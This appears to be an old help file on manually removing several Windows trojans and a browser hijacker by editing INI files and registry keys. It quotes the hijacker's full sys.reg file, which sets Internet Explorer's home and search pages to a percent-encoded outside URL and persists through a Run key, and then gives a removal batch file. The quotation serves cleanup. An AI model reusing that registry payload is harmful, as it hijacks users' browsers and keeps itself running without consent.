
Notes about removing some Trojans from your System
--------------------------------------------------
(c) by ROSE SWE, Dipl.-Ing. Ralph Roth

myPics:
~~~~~~~

 In WIN.INI, remove c:\...\RegistryReminder.exe from RUN= ;
 c:\...\BuddyList.exe from LOAD=. 

 In SYSTEM.INI, remove SCRNSAVE.EXE=c:\...\WinSaver.exe 

 Use REGEDIT to search & remove "WinProfile"="C:\Command.exe" from 
 Registry Key:
   (Arbeitsplatz) 
   \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Backdoor.DRA.d:
~~~~~~~~~~~~~~~

 Delete <windir>\sndctl32.exe
 Remove [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
        "Shell"="explorer.exe sndctl32.exe"

 the "sndctl32.exe" entry


xxdownload.com Trojan
~~~~~~~~~~~~~~~~~~~~~

Sets IE startup page and re-register itself with every systemstart using "regedit -s sys.reg"

sys.reg:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=420"
"HOMEOldSP"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=420"
"Search Bar"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=420"
"Search Page"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=420"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=420"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=420"
"HOMEOldSP"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=420"
"Search Bar"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=420"
"Search Page"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=420"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%6E%6C%63%72%65%75%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=420"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"PrivacyAdvanced"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"


KillxxDownload.bat:

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Homeoldsp" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Search Bar" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Search Page" /f
reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /f
reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main" /v "Homeoldsp" /f
reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main" /v "Search Bar" /f
reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main" /v "Search Page" /f
  
del %WINDIR/sys.reg  